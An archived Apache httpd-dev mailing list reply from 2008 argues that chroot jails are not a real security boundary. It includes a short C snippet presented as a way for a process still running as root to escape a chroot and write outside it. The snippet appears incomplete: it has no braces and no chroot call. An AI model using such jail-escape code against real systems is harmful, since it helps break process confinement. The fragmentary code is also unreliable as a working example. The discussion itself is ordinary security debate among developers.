httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Plüm, Rüdiger, VF-Group <>
Subject RE: High security
Date Thu, 24 Jan 2008 12:50:54 GMT

> -----Original Message-----
> From: Colm MacCarthaigh [] 
> Sent: Donnerstag, 24. Januar 2008 13:16
> To:
> Subject: Re: High security
> On Thu, Jan 24, 2008 at 01:10:23PM +0100, Nick Gearls wrote:
> > You specify one directive, and the only thing you have to 
> put in the 
> > jail is your htdocs and logs directories; all other files (conf, 
> > modules, httpd, libraries, etc.) are outside of the jail. 
> This is really 
> > top security - it's almost impossible to find something to hack.
> Well don't kid yourself, it makes privilege escalation by 
> certain routes
> much harder, but it's not even clost to almost impossible. There are
> many forms of IPC available between the children and the root-level
> Apache process anyway, and if you manage to exploit that it's 
> game over
> anyway (including breaking out of the jail). 

Yep. chroot was never designed to be a security feature. It can make
things more difficult to leave a jailed area.

See also

or have a look at

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char *argv[])
    FILE *file;

    file = fopen("blah1", "w");
    fprintf(file, "Hello\n");
    mkdir("foo", 493);
    file = fopen("blah2", "w");
    fprintf(file, "Hello\n");
    return 0;

which allows you to escape the chroot of /tmp/zw/blah1 if
you are still root at the point of time mkdir is executed
and write a file to /tmp/zw/blah2



View raw message